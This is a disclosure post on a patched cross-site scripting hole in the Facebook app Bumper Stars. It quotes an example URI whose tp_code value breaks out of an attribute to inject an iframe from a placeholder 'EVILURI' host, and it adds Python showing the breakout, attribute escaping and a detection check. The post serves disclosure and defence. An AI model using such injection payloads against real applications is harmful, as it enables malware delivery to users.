FAXX Hack: Bumper Stars

Facebook Verified Application

Current Monthly Active Users: 55,431

Current Rank on Application Leaderboard: 659

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bumperstars/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Notes: You’ll notice the example URI only inserts an iframe, rather than attempting the sort of double-injection of previous examples. Bumper Stars, and two other Large Animal Games applications that will be posted soon, use Facebook’s server whitelist feature for API requests. This means that trying to use injected JavaScript to make API calls will fail, as they originate from the user’s computer and not LAG’s servers. One could still have used the XSS hole to launch a malware attack, but using the whitelist prevents stealing profile information or launching a viral attack via notifications and feed stories.

Bumper Stars was the first application I’ve encountered that made use of the server whitelist feature, and I commend LAG for that step. But while the feature can prevent many of the attacks I’ve outlined, it is not practical for every application. Many other developers make use of the JavaScript API for legitimate calls, and these would fail if the developer enabled a server whitelist.
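To make the injection context concrete, here is an added example (not code from the original post or from Large Animal Games) that decodes the example URI's tp_code parameter, reflects it into an FBML attribute the way an unescaped invite.php might have, and then shows the attribute-context escaping that keeps the value inert. The render functions are hypothetical stand-ins for the application's own page; the URI is the one quoted above.

```python
"""Added example, not from the original post: why reflecting the `tp_code`
query parameter into a markup attribute without escaping lets the value break
out of the attribute, and how attribute-context escaping closes that hole.
The two render_* functions are hypothetical stand-ins for invite.php."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# The example URI quoted in the post, reused here as constructed test input.
EXAMPLE_URI = ("http://apps.facebook.com/bumperstars/invite.php"
               "?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E")


def tp_code_from_uri(uri: str) -> str:
    """Return the decoded tp_code parameter exactly as the app would see it."""
    query = parse_qs(urlsplit(uri).query)
    return query.get("tp_code", [""])[0]


def render_vulnerable(tp_code: str) -> str:
    """Hypothetical 'before': the raw value is dropped into a quoted attribute.

    A value containing a double quote terminates the attribute early, so the
    rest of the value is parsed as new markup (here, an <fb:iframe> element).
    """
    return '<input type="hidden" name="tp_code" value="%s"/>' % tp_code


def render_hardened(tp_code: str) -> str:
    """Hypothetical 'after': escape for attribute context.

    html.escape(..., quote=True) rewrites &, <, >, " and ' as entities, so the
    untrusted value can no longer close the attribute or open an element.
    """
    return '<input type="hidden" name="tp_code" value="%s"/>' % escape(tp_code, quote=True)


def contains_injected_tag(markup: str, tag: str = "<fb:iframe") -> bool:
    """Detection helper: did the untrusted value manage to open a new element?"""
    return tag in markup


if __name__ == "__main__":
    value = tp_code_from_uri(EXAMPLE_URI)
    print("decoded tp_code:", value)
    print("vulnerable:", render_vulnerable(value))
    print("hardened:  ", render_hardened(value))
```

Running the block prints the decoded parameter (`"/><fb:iframe src="EVILURI">`), the broken-out markup from the unescaped render, and the escaped render in which the whole value stays inside the `value` attribute. The escaping has to match the context the value lands in; attribute escaping alone would not be enough if the same parameter were also echoed inside a script block or a URL.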
